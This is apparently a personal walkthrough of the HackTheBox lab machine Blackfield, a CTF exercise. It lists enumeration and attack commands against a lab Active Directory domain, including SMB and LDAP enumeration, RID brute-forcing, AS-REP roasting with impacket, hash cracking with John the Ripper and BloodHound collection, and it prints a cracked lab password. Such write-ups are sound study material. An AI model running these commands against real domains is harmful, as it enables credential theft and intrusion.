✒️Blackfield

About

Backfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. Once user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database, and retrieve the hash of the primary domain administrator.

nmap -T4 -p- -A -Pn -oA scan 10.10.10.192

# Nmap scan initiated as: nmap -T4 -p- -A -Pn -oA scan 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.15s latency).
Not shown: 65526 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-08 06:03:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open  msrpc         Microsoft Windows RPCHost script results:
|_clock-skew: 7h04m46s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-08T06:04:07
|_  start_date: N/A

nmap result got us the domain name blackfield.local. save this in /etc/hosts file. Also notice the keys words here: Kerberos, msrpc, Active Directory LDAP, domain, smb(microsoft-ds).

Nmap LDAP scanning

nmap -n -sV --script "ldap* and not brute" -p 389 10.10.10.192

Nmap smb vuln scan

nmap -PN --script vuln -p139,445 10.10.10.192

Enum4Linux

It’s also worth using this tool whilst we’re dealing with AD env and/or standalone Windows machines:

enum4linux -a 10.10.10.192 -u guest -p ''

Listing smb shares as a guest

smbmap -d BLACKFIELD.local -H 10.10.10.192 -u guest -p ""

Ldapsearch

This tool is useful for AD enumeration

ldapsearch -x -H ldap://10.10.10.192 -s base -b "" namingContexts

The naming context of the DC

Username enumeration via RID cycling Use SMB instead of LDAP.

crackmapexec smb 10.10.10.192 --rid-brute

AS-REP roasting (key vulnerability) Once you have usernames:

impacket-GetNPUsers BLACKFIELD.local/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt

RPC anonymous login using RPCclient

rpcclient -U "" -N 10.10.10.192

Trying to list AD users with guest creds using Impacket GetADUsers tool

python3 GetADUsers.py -all BLACKFIELD.local/guest -dc-ip 10.10.10.192

LookUpSID

This tool works by brute forcing SIDs for all AD users.

Here I used guest credentials to retrieve all users within the AD env!

python2 lookupsid.py BLACKFIELD.local/[email protected]

python2 lookupsid.py BLACKFIELD.local/[email protected] | grep "SidTypeUser" | sed 's/.BLACKFIELD\(.) (.*/\1/' > /root/machines/Blackfield/users.txt

Kerbrute

Kerbrute is a tool for user enumeration and password spraying, it tests against Kerberos and takes advantage of the way Kerberos responds to queries for invalid users.

https://github.com/Sq00ky/attacktive-directory-tools

kerbrute userenum -d BLACKFIELD.local --dc BLACKFIELD.local /root/machines/Blackfield/users.txt

https://medium.com/@Taleen05/htb-blackfield-machine-walkthrough-f9517954bb90

With the users’ list that we have, we’re gonna implement a so-called AS-REP Roasting attack, which is all about retrieving a TGT for those who have the pre-authentication option disabled, to execute this attack we’ll be using the Impacket GetNPUsers tool.

python2 GetNPUsers.py -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile /root/machines/Blackfield/users_only.txt

now we have a TGT for the user support! which we could crack with the use of JohnTheRipper.

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt asreproast.txt

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt /root/machines/Blackfield/GetNPUsers.txt

#00^BlackKnight ([email protected])

Tried to implement a Kerberoasting attack (which is all about retrieving a Service Ticket (ST/ TGS) if there are any SPN accounts)

python2 GetNPUsers.py BLACKFIELD.local/'support':'#00^BlackKnight' -request

With the acquired credentials, we proceeded to perform further enumeration of the target system using additional enumeration tools.

GetADUsers

I previously attempted to use this tool with guest credentials to enumerate valid users, but the account lacked sufficient privileges. We will now retry using the support account credentials.

python2 GetADUsers.py -all BLACKFIELD.local/support -dc-ip 10.10.10.192

This tool is that it gives us accurate information about users such as emails, Password last set, and Last logon.

As you can see from the above images, the valid users are 6! and the left users have NEVER logged in.

Using RPCclient again with support credentials allows us to further enumerate the AD env.

AD users. - rpcclient -U support 10.10.10.192

AD Groups.

create a new user with the use of RPCclient, but wasn’t able to.

createdomuser t0m1

I didn’t know where to go, so I decided to use google for more enumeration tools.I found a blog that was talking about the ability to use the BloodHound tool without even having a shell! you just need valid credentials.

bloodhound-python -d BLACKFIELD.local -u support -p '#00^BlackKnight' -c all -ns 10.10.10.192